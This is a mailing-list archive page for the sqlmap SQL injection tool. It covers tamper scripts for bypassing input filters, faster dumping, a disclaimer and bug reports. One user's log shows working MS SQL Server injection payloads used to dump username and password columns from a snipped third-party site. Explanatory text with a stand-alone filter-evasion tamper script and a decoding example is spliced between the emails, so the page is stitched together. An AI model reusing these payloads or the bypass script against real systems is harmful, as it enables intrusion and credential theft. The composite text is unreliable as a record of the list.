sqlmap-users Mailing List for sqlmap (Page 93)
Brought to you by: inquisb
From: Bernardo D. A. G. <ber...@gm...> - 2011-05-30 16:46:23

Inline..

Bernardo Damele A. G.
This message was sent from a smartphone

On 28 May 2011, at 21:17, Giorgio Fedon <gio...@gm...> wrote:

> Thank you for pointing it out, but the post is more aimed to explain
> which part of SQL to modify to change the logic.

Nice blog post. Also, consider writing and using your own tamper scripts if you can. I look forward to hearing feedback from you about that feature. It is of course documented in the user's manual.

> It was just an example, I fell into things like the need for hex encodings
> or other stuff...

Giorgio, feel free to request features. They may well already be in our ticketing system, or may not!

> in addition the preliminary checks may not work and block you either

If you provide tamper scripts, prefix, suffix and dbms then sqlmap should do very few initial requests at the detection phase. To avoid any fingerprint request, provide --dbms with "mssql 2005" for instance.

>
> Giorgio
>
> 2011/5/28 Miroslav Stampar <mir...@gm...>:
>> hi.
>>
>> now after the last commit (added ./tamper/equaltolike.py tampering script)
>> you can avoid filtering of >, < and = chars with:
>>
>> --tamper="between,equaltolike"
>>
>> kr
>>
>> On Sat, May 28, 2011 at 1:28 PM, Miroslav Stampar <mir...@gm...> wrote:
>>> hi Giorgio.
>>>
>>> we have a mechanism called "tampering" for doing this kind of thing.
>>>
>>> e.g. for dealing with the characters > and < you can try to use
>>> --tamper=between which will replace standard greater/less than
>>> characters in inference with the BETWEEN operator
>>>
>>> kr
>>>
>>> On Sat, May 28, 2011 at 1:02 PM, Giorgio Fedon <gio...@gm...> wrote:
>>>> Dear List,
>>>>
>>>> A tool cannot deal automatically with particular contexts and situations.
>>>> A common reason of failure for SQL injection tools is the fact that
>>>> some fields are vulnerable but somehow sanitized.
>>>>
>>>> If fields are sanitized the penetration tester must:
>>>> 1) Understand which characters are filtered and how
>>>> 2) Find how to make the blind SQL logic work even if there are
>>>> restrictions in place
>>>> 3) Use a tool that can be customized with your new logic
>>>>
>>>> sqlmap is the best tool available for me (I am a strong sqlmap supporter
>>>> :D) because it's not only powerful, but also fully customizable and meets
>>>> these requirements perfectly.
>>>>
>>>> You can find the post here:
>>>> http://blog.mindedsecurity.com/2011/05/customizing-sqlmap-to-bypass-weak-but.html
>>>>
>>>> Thank you,
>>>>
>>>> Giorgio Fedon
>>>>
>>>> ------------------------------------------------------------------------------
>>>> vRanger cuts backup time in half-while increasing security.
>>>> With the market-leading solution for virtual backup and recovery,
>>>> you get blazing-fast, flexible, and affordable data protection.
>>>> Download your free trial now.
>>>> http://p.sf.net/sfu/quest-d2dcopy1
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>> --
>>> Miroslav Stampar
>>> E-mail: miroslav.stampar (at) gmail.com
>>> PGP Key ID: 0xB5397B1B
>>
>> --
>> Miroslav Stampar
>> E-mail: miroslav.stampar (at) gmail.com
>> PGP Key ID: 0xB5397B1B
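The thread above recommends --tamper="between,equaltolike" for a filter that blocks >, < and =, and Bernardo suggests writing your own tamper script. The file below is an added example in the shape sqlmap loads from ./tamper/; it is not sqlmap's own between.py or equaltolike.py and imports nothing from sqlmap, so it runs stand-alone (the real scripts take __priority__ from lib.core.enums.PRIORITY; the integer here and the tamper(payload, **kwargs) signature are assumptions). It rewrites A > B into A NOT BETWEEN 0 AND B and A = B into A LIKE B, and leaves a strict < alone, since BETWEEN is inclusive and has no exact single-operator equivalent for it. The sample payloads in the main block are constructed for illustration.

```python
import re

# Added example of a sqlmap-style tamper script; not code from the sqlmap project.
# Rewrites:
#   A > B   ->  A NOT BETWEEN 0 AND B     (the idea behind between.py)
#   A = B   ->  A LIKE B                  (the idea behind equaltolike.py)
# Caveats a tester must keep in mind:
#   * NOT BETWEEN 0 AND B is only equivalent to > B when A is non-negative,
#     which holds for sqlmap's ASCII()/ORD() based inference.
#   * LIKE treats '%' and '_' as wildcards, so string comparisons containing
#     them change meaning; numeric comparisons are unaffected.

__priority__ = 0   # assumption: plain integer; sqlmap's scripts use PRIORITY.*

# "A > B": operands without whitespace, and the '>' must not be part of '>='
_GT = re.compile(r"(\S+)\s*>(?!=)\s*(\S+)")
# a standalone '=' that is not the tail of '<=', '>=' or '!='
_EQ = re.compile(r"(?<![<>!])\s*=\s*")


def dependencies():
    """Hook sqlmap calls before using the script; nothing is needed here."""
    pass


def tamper(payload, **kwargs):
    """Return the payload with every '>' and '=' comparison rewritten."""
    if not payload:
        return payload
    retVal = _GT.sub(r"\1 NOT BETWEEN 0 AND \2", payload)
    retVal = _EQ.sub(" LIKE ", retVal)
    return retVal


def is_clean(payload):
    """True when the payload carries none of the characters the filter blocks."""
    return not any(c in payload for c in "<>=")


if __name__ == "__main__":
    # constructed sample payloads, in the shape sqlmap's boolean-based
    # inference produces
    for p in ("1 AND 3888=3888",
              "1 AND ASCII(SUBSTRING(name,1,1)) > 64--",
              "1 AND a>=b"):
        print("%-42s -> %s" % (p, tamper(p)))
```

Dropped into sqlmap's tamper/ directory it would be selected with --tamper=<name>; combined with --prefix, --suffix and --dbms (for example --dbms="mssql 2005", as Bernardo notes) the detection phase sends very few untampered requests. Check the rewritten payload by hand against the target's filter first: a rewrite that is syntactically clean but semantically wrong makes blind inference return garbage rather than an error.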
From: Miroslav S. <mir...@gm...> - 2011-05-30 09:48:58

hi all.

just one related piece of news: after a long time we've launched a profiler and found one pesky little f.cker (reflective removal mechanism - regular expression usage).

to make this short, you'll notice real speedups in all instances (especially UNION technique usage). this means that now with --threads and UNION/ERROR techniques there shouldn't be any real obstacles from our side (other than the connection speed itself) to a really really fast dumping process

kr

On Mon, May 30, 2011 at 4:40 AM, David Guimaraes <sk...@gm...> wrote:
> Thanks guys .. this is something very useful, that I missed a lot .. I tried
> here and it works like a charm. Very fast!
>
> On Sun, May 29, 2011 at 8:19 PM, Miroslav Stampar <mir...@gm...> wrote:
>> Hi all.
>>
>> As the title says, now you'll be able to run multithreaded UNION/ERROR
>> based dumpings :)
>>
>> Please report any bugs you encounter.
>>
>> KR
>>
>> p.s. known issue (will do something about it) - when doing multiple
>> fast Ctrl+C and after program terminates: "Exception KeyboardInterrupt
>> in <module 'threading' from '...'> ignored"
>>
>> --
>> Miroslav Stampar
>> E-mail: miroslav.stampar (at) gmail.com
>> PGP Key ID: 0xB5397B1B
>
> --
> David Gomes Guimarães

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: David G. <sk...@gm...> - 2011-05-30 02:41:14

Thanks guys .. this is something very useful, that I missed a lot .. I tried here and it works like a charm. Very fast!

On Sun, May 29, 2011 at 8:19 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi all.
>
> As the title says, now you'll be able to run multithreaded UNION/ERROR
> based dumpings :)
>
> Please report any bugs you encounter.
>
> KR
>
> p.s. known issue (will do something about it) - when doing multiple
> fast Ctrl+C and after program terminates: "Exception KeyboardInterrupt
> in <module 'threading' from '...'> ignored"
>
> --
> Miroslav Stampar
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B

--
David Gomes Guimarães
From: Miroslav S. <mir...@gm...> - 2011-05-29 23:19:14

Hi all.

As the title says, now you'll be able to run multithreaded UNION/ERROR based dumpings :)

Please report any bugs you encounter.

KR

p.s. known issue (will do something about it) - when doing multiple fast Ctrl+C and after program terminates: "Exception KeyboardInterrupt in <module 'threading' from '...'> ignored"

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-05-29 06:26:15

On Sun, May 29, 2011 at 2:39 AM, Chris Oakley <chr...@gm...> wrote:
> Good idea. It's an unfortunate fact that professional tools such as this
> can be used by the wrong hands. I doubt you'd be held responsible with or
> without the disclaimer though. That said, it should read "mutual consent"
> not "mutual consistency". Cheers, Chris.

hi.

thanks for the spot. as english is not our first language you are all more than welcome to report "language" bugs too.

kr

> On 28 May 2011 19:59, Miroslav Stampar <mir...@gm...> wrote:
>> hi all.
>>
>> as the current situation seems to be out of control (latest headlines)
>> we need to add some kind of "disclaimer" warning you that you are
>> grown ups and that you know what you are doing - it's your own (!)
>> responsibility what you are doing with it.
>>
>> sqlmap/1.0-dev (rxxxx) - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [!] Legal Disclaimer: usage of sqlmap for attacking web servers without
>> prior mutual consistency can be considered as an illegal activity. it is
>> the final user's responsibility to obey all applicable local, state and
>> federal laws. authors assume no liability and are not responsible for any
>> misuse or damage caused by this program.
>>
>> [*] starting at: xx:xx:xx
>>
>> kr
>>
>> --
>> Miroslav Stampar
>> E-mail: miroslav.stampar (at) gmail.com
>> PGP Key ID: 0xB5397B1B

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Chris O. <chr...@gm...> - 2011-05-29 00:39:47

Good idea. It's an unfortunate fact that professional tools such as this can be used by the wrong hands. I doubt you'd be held responsible with or without the disclaimer though. That said, it should read "mutual consent" not "mutual consistency".

Cheers,
Chris.

On 28 May 2011 19:59, Miroslav Stampar <mir...@gm...> wrote:
> hi all.
>
> as the current situation seems to be out of control (latest headlines)
> we need to add some kind of "disclaimer" warning you that you are
> grown ups and that you know what you are doing - it's your own (!)
> responsibility what you are doing with it.
>
> sqlmap/1.0-dev (rxxxx) - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [!] Legal Disclaimer: usage of sqlmap for attacking web servers without
> prior mutual consistency can be considered as an illegal activity. it is
> the final user's responsibility to obey all applicable local, state and
> federal laws. authors assume no liability and are not responsible for any
> misuse or damage caused by this program.
>
> [*] starting at: xx:xx:xx
>
> kr
>
> --
> Miroslav Stampar
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
From: Giorgio F. <gio...@gm...> - 2011-05-28 20:16:26

Thank you for pointing it out, but the post is more aimed to explain which part of SQL to modify to change the logic. It was just an example, I fell into things like the need for hex encodings or other stuff... in addition the preliminary checks may not work and block you either

Giorgio

2011/5/28 Miroslav Stampar <mir...@gm...>:
> hi.
>
> now after the last commit (added ./tamper/equaltolike.py tampering script)
> you can avoid filtering of >, < and = chars with:
>
> --tamper="between,equaltolike"
>
> kr
>
> On Sat, May 28, 2011 at 1:28 PM, Miroslav Stampar <mir...@gm...> wrote:
>> hi Giorgio.
>>
>> we have a mechanism called "tampering" for doing this kind of thing.
>>
>> e.g. for dealing with the characters > and < you can try to use
>> --tamper=between which will replace standard greater/less than
>> characters in inference with the BETWEEN operator
>>
>> kr
>>
>> On Sat, May 28, 2011 at 1:02 PM, Giorgio Fedon <gio...@gm...> wrote:
>>> Dear List,
>>>
>>> A tool cannot deal automatically with particular contexts and situations.
>>> A common reason of failure for SQL injection tools is the fact that
>>> some fields are vulnerable but somehow sanitized.
>>>
>>> If fields are sanitized the penetration tester must:
>>> 1) Understand which characters are filtered and how
>>> 2) Find how to make the blind SQL logic work even if there are
>>> restrictions in place
>>> 3) Use a tool that can be customized with your new logic
>>>
>>> sqlmap is the best tool available for me (I am a strong sqlmap supporter
>>> :D) because it's not only powerful, but also fully customizable and meets
>>> these requirements perfectly.
>>>
>>> You can find the post here:
>>> http://blog.mindedsecurity.com/2011/05/customizing-sqlmap-to-bypass-weak-but.html
>>>
>>> Thank you,
>>>
>>> Giorgio Fedon
>>
>> --
>> Miroslav Stampar
>> E-mail: miroslav.stampar (at) gmail.com
>> PGP Key ID: 0xB5397B1B
>
> --
> Miroslav Stampar
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-05-28 18:59:26

hi all.

as the current situation seems to be out of control (latest headlines) we need to add some kind of "disclaimer" warning you that you are grown ups and that you know what you are doing - it's your own (!) responsibility what you are doing with it.

sqlmap/1.0-dev (rxxxx) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consistency can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: xx:xx:xx

kr

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-05-28 16:03:29

hi.

now after the last commit (added ./tamper/equaltolike.py tampering script) you can avoid filtering of >, < and = chars with:

--tamper="between,equaltolike"

kr

On Sat, May 28, 2011 at 1:28 PM, Miroslav Stampar <mir...@gm...> wrote:
> hi Giorgio.
>
> we have a mechanism called "tampering" for doing this kind of thing.
>
> e.g. for dealing with the characters > and < you can try to use
> --tamper=between which will replace standard greater/less than
> characters in inference with the BETWEEN operator
>
> kr
>
> On Sat, May 28, 2011 at 1:02 PM, Giorgio Fedon <gio...@gm...> wrote:
>> Dear List,
>>
>> A tool cannot deal automatically with particular contexts and situations.
>> A common reason of failure for SQL injection tools is the fact that
>> some fields are vulnerable but somehow sanitized.
>>
>> If fields are sanitized the penetration tester must:
>> 1) Understand which characters are filtered and how
>> 2) Find how to make the blind SQL logic work even if there are
>> restrictions in place
>> 3) Use a tool that can be customized with your new logic
>>
>> sqlmap is the best tool available for me (I am a strong sqlmap supporter
>> :D) because it's not only powerful, but also fully customizable and meets
>> these requirements perfectly.
>>
>> You can find the post here:
>> http://blog.mindedsecurity.com/2011/05/customizing-sqlmap-to-bypass-weak-but.html
>>
>> Thank you,
>>
>> Giorgio Fedon
>
> --
> Miroslav Stampar
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-05-28 11:29:05

hi Giorgio.

we have a mechanism called "tampering" for doing this kind of thing.

e.g. for dealing with the characters > and < you can try to use --tamper=between which will replace standard greater/less than characters in inference with the BETWEEN operator

kr

On Sat, May 28, 2011 at 1:02 PM, Giorgio Fedon <gio...@gm...> wrote:
> Dear List,
>
> A tool cannot deal automatically with particular contexts and situations.
> A common reason of failure for SQL injection tools is the fact that
> some fields are vulnerable but somehow sanitized.
>
> If fields are sanitized the penetration tester must:
> 1) Understand which characters are filtered and how
> 2) Find how to make the blind SQL logic work even if there are
> restrictions in place
> 3) Use a tool that can be customized with your new logic
>
> sqlmap is the best tool available for me (I am a strong sqlmap supporter
> :D) because it's not only powerful, but also fully customizable and meets
> these requirements perfectly.
>
> You can find the post here:
> http://blog.mindedsecurity.com/2011/05/customizing-sqlmap-to-bypass-weak-but.html
>
> Thank you,
>
> Giorgio Fedon

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Giorgio F. <gio...@gm...> - 2011-05-28 11:02:45

Dear List,

A tool cannot deal automatically with particular contexts and situations. A common reason of failure for SQL injection tools is the fact that some fields are vulnerable but somehow sanitized.

If fields are sanitized the penetration tester must:
1) Understand which characters are filtered and how
2) Find how to make the blind SQL logic work even if there are restrictions in place
3) Use a tool that can be customized with your new logic

sqlmap is the best tool available for me (I am a strong sqlmap supporter :D) because it's not only powerful, but also fully customizable and meets these requirements perfectly.

You can find the post here:
http://blog.mindedsecurity.com/2011/05/customizing-sqlmap-to-bypass-weak-but.html

Thank you,

Giorgio Fedon
From: Miroslav S. <mir...@gm...> - 2011-05-26 14:16:31

hi Chris.

i've just tried to do it and it's already supported from the point of dumping table content. the only thing is that when column names are being dumped, if you press Ctrl+C the program aborts. maybe we should modify this a bit to satisfy your needs.

kr

On Thu, May 26, 2011 at 3:54 PM, Miroslav Stampar <mir...@gm...> wrote:
> hi Chris.
>
> not a bad idea. we'll do it and report back to you.
>
> kr
>
> On Thu, May 26, 2011 at 3:41 PM, Chris Oakley <chr...@gm...> wrote:
>> Hi there
>>
>> If I have set sqlmap to dump a load of tables, can I make it stop dumping
>> from the current table after a while and go to the next? I'm thinking a
>> ctrl+c except that this instance has been running for hours so I don't want
>> to try it in case it's not right. Sometimes only a few rows from each table
>> are required.
>>
>> Cheers
>>
>> Chris
>
> --
> Miroslav Stampar
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-05-26 13:54:58

hi Chris.

not a bad idea. we'll do it and report back to you.

kr

On Thu, May 26, 2011 at 3:41 PM, Chris Oakley <chr...@gm...> wrote:
> Hi there
>
> If I have set sqlmap to dump a load of tables, can I make it stop dumping
> from the current table after a while and go to the next? I'm thinking a
> ctrl+c except that this instance has been running for hours so I don't want
> to try it in case it's not right. Sometimes only a few rows from each table
> are required.
>
> Cheers
>
> Chris

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-05-26 13:46:39

hi Dennis.

thank you for your report; you'll find it fixed in the latest commit.

kr

On Thu, May 26, 2011 at 1:25 PM, Dennis Hecken <ma...@8d...> wrote:
> [13:24:37] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run with
> the latest development version from the Subversion repository. If the
> exception persists, please send by e-mail to sql...@li... the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get back
> to you.
>
> sqlmap version: 0.9 (r3630)
> Python version: 2.7.1
> Operating system: nt
> Command line: C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\sqlmap.py -v 1 -u *********************************************************************************************
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\sqlmap.py", line 82, in main
>     start()
>   File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\controller\controller.py", line 311, in start
>     checkStability()
>   File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\controller\checks.py", line 659, in checkStability
>     secondPage, _ = Request.queryPage(content=True)
>   File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\request\connect.py", line 518, in queryPage
>     page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
>   File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\request\connect.py", line 207, in getPage
>     requestMsg += "\n%s" % requestHeaders
> UnicodeDecodeError: 'ascii' codec can't decode byte 0xff in position 81: ordinal not in range(128)

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
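The traceback quoted above dies while building the request log: a str holding raw header bytes (one of them 0xff) is folded into a unicode message and Python 2 implicitly decodes it as ASCII. The security point for any scanner is that bytes which are not valid in the expected encoding can come straight from the target, so logging must never be allowed to abort a run. The block below is an added Python 3 illustration of that failure class and of a tolerant decode for log output; it is not sqlmap's code or its actual fix, and the header bytes are constructed for the example.

```python
# Added example, not sqlmap code: the strict decode that the traceback above
# shows failing, beside a best-effort decode that is safe to use when building
# a request/response log line from bytes the remote side controls.

# constructed sample: an otherwise ASCII header block carrying 0xe9 and 0xff
RAW_HEADERS = b"Host: example.test\r\nX-Custom: caf\xe9 \xff\r\n"


def decode_strict(data: bytes) -> str:
    """Assume ASCII, as the failing concatenation effectively did."""
    return data.decode("ascii")


def decode_for_log(data: bytes) -> str:
    """Best-effort text for a log line: UTF-8 when it is valid, otherwise the
    same bytes with the offending ones escaped (\\xff). Never raises, so a
    hostile or merely odd byte from the target cannot abort the whole run."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return data.decode("utf-8", errors="backslashreplace")


def strict_fails(data: bytes) -> bool:
    """True when the strict path raises on this input (the reported crash)."""
    try:
        decode_strict(data)
    except UnicodeDecodeError:
        return True
    return False


def build_request_log(request_line: str, raw_headers: bytes) -> str:
    """What the failing line was doing, with the tolerant decode in place."""
    return "%s\n%s" % (request_line, decode_for_log(raw_headers))


if __name__ == "__main__":
    print("strict decode raises:", strict_fails(RAW_HEADERS))
    print(build_request_log("GET / HTTP/1.1", RAW_HEADERS))
```

backslashreplace keeps the evidence (the escaped byte values stay visible in the log) instead of silently dropping it as errors="ignore" would, which matters when the odd byte is itself the thing you are trying to diagnose.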
From: Chris O. <chr...@gm...> - 2011-05-26 13:41:11

Hi there

If I have set sqlmap to dump a load of tables, can I make it stop dumping from the current table after a while and go to the next? I'm thinking a ctrl+c except that this instance has been running for hours so I don't want to try it in case it's not right. Sometimes only a few rows from each table are required.

Cheers

Chris
From: Bernardo D. A. G. <ber...@gm...> - 2011-05-26 13:32:01

I suggest we could look into the list of supported hashing algorithms by hashcat and jtr and maybe implement some of them now that we already have good coverage for the DBMS specific ones.

Bernardo Damele A. G.
This message was sent from a smartphone

On 26 May 2011, at 10:36, Miroslav Stampar <mir...@gm...> wrote:
> Hi all.
>
> I have a general question (mostly pointing to those I won't mention,
> but use sqlmap a lot :).
>
> Do you want/need any other hash attack algorithm to be implemented?
>
> KR
>
> --
> Miroslav Stampar
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
From: Dennis H. <ma...@8d...> - 2011-05-26 11:58:27

[13:24:37] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.

sqlmap version: 0.9 (r3630)
Python version: 2.7.1
Operating system: nt
Command line: C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\sqlmap.py -v 1 -u *********************************************************************************************
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\sqlmap.py", line 82, in main
    start()
  File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\controller\controller.py", line 311, in start
    checkStability()
  File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\controller\checks.py", line 659, in checkStability
    secondPage, _ = Request.queryPage(content=True)
  File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\request\connect.py", line 518, in queryPage
    page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\request\connect.py", line 207, in getPage
    requestMsg += "\n%s" % requestHeaders
UnicodeDecodeError: 'ascii' codec can't decode byte 0xff in position 81: ordinal not in range(128)
From: Miroslav S. <mir...@gm...> - 2011-05-26 08:36:08

Hi all.

I have a general question (mostly pointing to those I won't mention, but use sqlmap a lot :).

Do you want/need any other hash attack algorithm to be implemented?

KR

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-05-26 08:19:04
|
hi Vinicius.

thank you for your report. this resulted in a commit with few related
"stability" patches (a.k.a. "None crashes"). so, with the last commit your
problem should be solved.

still, i am not sure why there was a 404:

"[19:35:15] [INFO] the SQL query used returns 3 entries
[19:35:15] [CRITICAL] connection exception detected. sqlmap will display
partial output'page not found (404)'"

if you think that was sqlmap's fault you can contact me privately with
some more info.

kr

2011/5/26 Vinícius ~ <vin...@gm...>:
> ./sqlmap.py -u "http://[snip]/Poll.aspx?id=10" -T usuario -C
> USUA_NO_USUARIO,USUA_ID_USUARIO,USUA_DE_SENHA --dump
>
> sqlmap/1.0-dev (r3952) - automatic SQL injection and database takeover
> tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 19:35:11
>
> [19:35:11] [INFO] using '/home/sqlmap-dev/output/[snip]/session' as session
> file
> [19:35:11] [INFO] resuming injection data from session file
> [19:35:11] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from
> session file
> [19:35:11] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: id
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: id=10 AND 3888=3888
>
> Type: error-based
> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
> clause
> Payload: id=10 AND
> 3759=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(118)+CHAR(122)+CHAR(58)+(SELECT
> (CASE WHEN (3759=3759) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(58)+CHAR(109)+CHAR(106)+CHAR(107)+CHAR(58)))
>
> Type: stacked queries
> Title: Microsoft SQL Server/Sybase stacked queries
> Payload: id=10; WAITFOR DELAY '0:0:5';--
>
> Type: AND/OR time-based blind
> Title: Microsoft SQL Server/Sybase time-based blind
> Payload: id=10 WAITFOR DELAY '0:0:5'--
> ---
>
> [19:35:12] [INFO] for manual usage GET and POST payloads require url
> encoding
> [19:35:12] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows Vista
> web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
> back-end DBMS: Microsoft SQL Server 2005
> [19:35:12] [WARNING] missing database parameter, sqlmap is going to use the
> current database to enumerate table(s) entries
> [19:35:12] [INFO] fetching current database
> [19:35:12] [INFO] read from file '/home/[snip]/session': [snip]
> do you want to use LIKE operator to retrieve column names similar to the
> ones provided with the -C option? [Y/n] n
> [19:35:14] [INFO] fetching columns 'USUA_NO_USUARIO, USUA_ID_USUARIO,
> USUA_DE_SENHA' for table 'dbo.usuario' on database 'Club'
> [19:35:15] [INFO] the SQL query used returns 3 entries
> [19:35:15] [CRITICAL] connection exception detected. sqlmap will display
> partial output'page not found (404)'
> [19:35:16] [WARNING] HTTP error codes detected during testing:
> 404 (Not Found) - 1 times, 500 (Internal Server Error) - 3 times
>
> [19:35:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3952), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r3952)
> Python version: 2.6.6
> Operating system: posix
> Command line: ./sqlmap.py -u
> ************************************************************ -T usuario -C
> ********************************************* --dump
> Technique: ERROR
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 84, in main
>     start()
>   File "/home/sqlmap-dev/lib/controller/controller.py", line 526, in start
>     action()
>   File "/home/sqlmap-dev/lib/controller/action.py", line 109, in action
>     conf.dbmsHandler.dumpTable()
>   File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1470, in
> dumpTable
>     self.getColumns(onlyColNames=True)
>   File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1081, in
> getColumns
>     if columnData[0] is not None:
> TypeError: 'NoneType' object is unsubscriptable
>
> [*] shutting down at: 19:35:1
>
> -
> Thanx!
>
> ------------------------------------------------------------------------------
> vRanger cuts backup time in half-while increasing security.
> With the market-leading solution for virtual backup and recovery,
> you get blazing-fast, flexible, and affordable data protection.
> Download your free trial now.
> http://p.sf.net/sfu/quest-d2dcopy1
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B |
From: Vinícius ~ <vin...@gm...> - 2011-05-26 07:40:41
|
./sqlmap.py -u "http://[snip]/Poll.aspx?id=10" -T usuario -C USUA_NO_USUARIO,USUA_ID_USUARIO,USUA_DE_SENHA --dump

sqlmap/1.0-dev (r3952) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 19:35:11

[19:35:11] [INFO] using '/home/sqlmap-dev/output/[snip]/session' as session file
[19:35:11] [INFO] resuming injection data from session file
[19:35:11] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[19:35:11] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=10 AND 3888=3888

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=10 AND 3759=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(118)+CHAR(122)+CHAR(58)+(SELECT (CASE WHEN (3759=3759) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(106)+CHAR(107)+CHAR(58)))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=10; WAITFOR DELAY '0:0:5';--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=10 WAITFOR DELAY '0:0:5'--
---

[19:35:12] [INFO] for manual usage GET and POST payloads require url encoding
[19:35:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[19:35:12] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[19:35:12] [INFO] fetching current database
[19:35:12] [INFO] read from file '/home/[snip]/session': [snip]
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] n
[19:35:14] [INFO] fetching columns 'USUA_NO_USUARIO, USUA_ID_USUARIO, USUA_DE_SENHA' for table 'dbo.usuario' on database 'Club'
[19:35:15] [INFO] the SQL query used returns 3 entries
